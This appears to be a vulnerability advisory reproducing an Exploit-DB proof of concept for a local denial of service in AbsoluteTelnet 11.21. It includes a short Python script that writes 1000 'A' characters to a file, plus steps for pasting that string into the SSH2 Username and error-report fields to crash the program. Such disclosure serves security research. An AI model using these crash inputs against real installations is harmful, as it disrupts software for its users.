Vendor: AbsoluteTelnet
By: Xenofon Vassilakopoulos
CVSS: 5.5 (MEDIUM)
Vulnerability Type: Denial of Service (DoS) Local
Product Name: AbsoluteTelnet
Affected Version From: 11.21
Affected Version To: 11.21
Patch Exists: NO
Platforms Tested: Windows 7 Professional x86 SP1
Year: 2020

AbsoluteTelnet 11.21 – ‘Username’ Denial of Service (PoC)

AbsoluteTelnet 11.21 is vulnerable to a local denial of service (DoS) when a specially crafted input (in the PoC below, a string of 1000 'A' characters) is provided to the 'Username' field of an SSH2 connection, which crashes the application. The crash can be triggered a second time from the error-report dialog that appears when the application is reopened: pasting the same input into the 'Your Email Address (optional)' field and pressing "Send Error Report" crashes the application again.

Mitigation:

There is currently no known mitigation for this vulnerability.

Exploit-DB raw data:

# Exploit Title: AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)
# Discovered by: Xenofon Vassilakopoulos
# Discovered Date: 2020-05-21
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe
# Tested Version: 11.21
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1

# Description: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC)

# Steps to reproduce:
# 1.  - Run Python script
# 2.  - Open absolutetelnet.txt and copy content to clipboard
# 3.  - Open AbsoluteTelnet 11.21
# 4.  - Select "new connection file -> Connection -> SSH2"
# 5.  - Paste the contents at the field "Authentication -> Username"
# 6.  - Press "ok" button
# 7.  - Crashed
# 8.  - Reopen AbsoluteTelnet 11.21
# 9.  - A new window will appear that prompts you to send an error report
# 10. - Open absolutetelnet.txt and copy content to clipboard
# 11. - Paste the contents at the field "Your Email Address (optional)"
# 12. - Press "Send Error Report" button
# 13. - Crashed

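# Build the 1000-character string of "A" (0x41) used in the steps above
buf = "\x41" * 1000

# Write it to absolutetelnet.txt; the context manager closes the file even on error
with open("absolutetelnet.txt", "w") as f:
    f.write(buf)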